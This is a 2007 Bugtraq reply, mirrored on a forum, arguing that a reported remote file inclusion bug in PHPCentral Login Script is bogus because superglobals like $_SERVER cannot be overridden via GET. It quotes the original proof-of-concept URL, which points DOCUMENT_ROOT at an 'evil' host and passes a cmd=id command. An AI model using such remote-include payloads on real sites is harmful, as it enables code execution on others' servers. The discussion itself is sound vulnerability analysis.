Re: PHPCentral Login Script Remote Command Execution Vulnerabili

看板Bugtraq作者holmgren.時間18年前 (2007/08/14 23:16)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/2 (看更多)

--nextPart4401847.biA2lRv9fQ Content-Type: text/plain; charset="iso-8859-15" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline On Sunday 12 August 2007 17:12, rizgar@linuxmail.org wrote: > include.php ; > > Lines 4 ; > > include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php"); > > PoC : > > http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=3Dhttp://evil.t= xt?& >cmd=3Did *Of course* this does not work. Setting register_globals to "On" causes the= =20 contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be=20 registered in the global variable namespace. But the superglobals=20 *themselves* are special. They shadow everything - you cannot define your o= wn=20 $_SERVER array, nor can it be overridden with HTTP GET or POST values. If=20 that were possible, using the superglobals would be useless; all scripts=20 would be vulnerable unless register_globals is off. PoC: echo '$_SERVER[DOCUMENT_ROOT] =3D ', $_SERVER[DOCUMENT_ROOT], "<br/>"; echo '$_GET["_SERVER"][DOCUMENT_ROOT] =3D ', $_GET["_SERVER"] [DOCUMENT_ROOT], "<br/>"; Outputs: $_SERVER[DOCUMENT_ROOT] =3D /home/www/docs $_GET["_SERVER"][DOCUMENT_ROOT] =3D /foo If the query string is _SERVER[DOCUMENT_ROOT]=3D/foo =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it= =20 would be fair to let PHP scripts rely on this, and not consider all scripts= =20 that don't initialize their variables as vulnerable unless they require=20 register_globals to be on (this is not to say that it's not a good idea to= =20 initialize variables). And it would of course be nice if people posting to Bugtraq actually tested= =20 their PoCs first. Can't the moderator spot obvious cases like this, or are= =20 all vaguely relevant posts accepted, potentially for public ridicule? =2D-=20 Magnus Holmgren holmgren@lysator.liu.se --nextPart4401847.biA2lRv9fQ Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQBGwWTXk7mRNn1h4+YRAq/VAKDPqifGWdOz5Jb+OUCM4rzWl/gsaACfQkyB hzwR0RlNr2pJVWkdKQjIDzw= =ODKz -----END PGP SIGNATURE----- --nextPart4401847.biA2lRv9fQ--

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 holmgren. 的文章

文章代碼(AID): #16mSSr00 (Bugtraq)

討論串 (同標題文章)

完整討論串 (本文為第 1 之 2 篇)：

排序：最新先 | 最舊先 | 留言數

Re: PHPCentral Login Script Remote Command Execution Vulnerabili Re: PHPCentral Login Script Remote Command Execution Vulnerabili

coley.

18年前, 08/16

Re: PHPCentral Login Script Remote Command Execution Vulnerabili Re: PHPCentral Login Script Remote Command Execution Vulnerabili

18年前, 08/14

文章代碼(AID): #16mSSr00 (Bugtraq)